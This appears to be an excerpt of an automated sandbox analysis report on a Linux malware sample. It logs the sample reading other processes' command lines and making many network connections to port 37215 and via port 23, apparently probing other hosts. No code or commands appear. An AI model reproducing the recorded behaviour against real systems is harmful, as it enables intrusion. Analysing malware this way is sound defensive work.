      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/789/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/1648/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/4495/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/6156/cmdlineJump to behavior
      Source: /tmp/yRo17s2Sbc (PID: 6241)File opened: /proc/4498/cmdlineJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6251)Directory: /home/saturnino/.cacheJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6251)Directory: /home/saturnino/.localJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6251)Directory: /home/saturnino/.configJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 6271)Directory: /home/saturnino/.cacheJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 6271)Directory: /home/saturnino/.localJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 6271)Directory: /home/saturnino/.configJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 6271)Directory: /home/saturnino/.configJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44798 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53284 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53284
      Source: unknownNetwork traffic detected: HTTP traffic on port 55870 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45514 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52374
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52380
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52384
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52386
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52628
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52634
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52636
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52650
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52662
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52674
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52688
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52692
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52696
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52698
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52708
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52710
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52712
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52714
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52736
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52746
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40758 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52766
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52786
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52794
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52796
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52800
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52802
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52804
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52808
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52834
      Source: unknownNetwork traffic detected: HTTP traffic on port 35426 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52846
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42282 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42282 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42054 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42282 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41668 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47132 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41668 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36062 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36062 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41668 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42282 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38034 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36062 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48722 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44256 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33208 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47706 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48722 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41668 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48722 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36062 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38752 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54378 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56984 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33774 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54378 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56984 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45486 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38752 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33774 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40834 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47448 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38200 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40834 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54378 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40834 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56984 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33774 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42282 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36146 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40834 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54378 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48722 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49594 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38752 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33774 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56984 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49594 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49594 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40834 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52034 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36720 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42572 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43180 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57322 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36720 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42572 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43180 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52034 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49594 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54378 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53392 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45786 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36720 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50614 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54188 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42572 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43180 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52034 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45786 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40748 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50614 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54188 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
